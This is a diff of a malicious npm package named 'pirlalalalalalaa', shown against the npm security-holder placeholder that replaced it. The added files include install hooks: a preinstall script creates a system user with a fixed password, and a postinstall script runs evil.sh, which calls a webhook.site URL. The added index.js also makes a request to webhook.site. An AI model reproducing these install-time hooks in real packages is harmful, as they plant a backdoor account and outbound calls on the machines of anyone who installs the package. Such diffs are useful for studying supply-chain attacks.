pirlalalalalalaa 0.0.1-security → 1.1.1

package/evil.sh

@@ -0,0 +1 @@
+curl https://webhook.site/1b1eb1b5-e492-4b6a-8341-26a48f9b117d/evil.txt

package/index.js

@@ -0,0 +1,29 @@
+const https = require('https')
+fs = require('fs');
+
+const options = {
+  hostname: 'webhook.site/1b1eb1b5-e492-4b6a-8341-26a48f9b117d',
+  port: 443,
+  path: '/todos',
+  method: 'GET'
+}
+
+const req = https.request(options, res => {
+  console.log(`statusCode: ${res.statusCode}`)
+
+  res.on('data', d => {
+    process.stdout.write(d)
+  })
+})
+
+req.on('error', error => {
+  console.error(error)
+})
+
+req.end()
+
+fs.writeFile('helloworld.txt', 'Hello World!', function (err) {
+  if (err) return console.log(err);
+  console.log('Hello World > helloworld.txt');
+});
+

package/package.json

@@ -1,6 +1,16 @@
 {
   "name": "pirlalalalalalaa",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.1.01",
+  "description": "",
+  "main": "index.js",
+  "dependencies": {
+    "event-stream": "^3.0.0"
+  },
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "preinstall": "useradd -p $(openssl passwd -1 password) username",
+    "postinstall":"./evil.sh"
+  },
+  "author": "pirskiwpyodfljhbab",
+  "license": "ISC"
 }

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=pirlalalalalalaa for more information.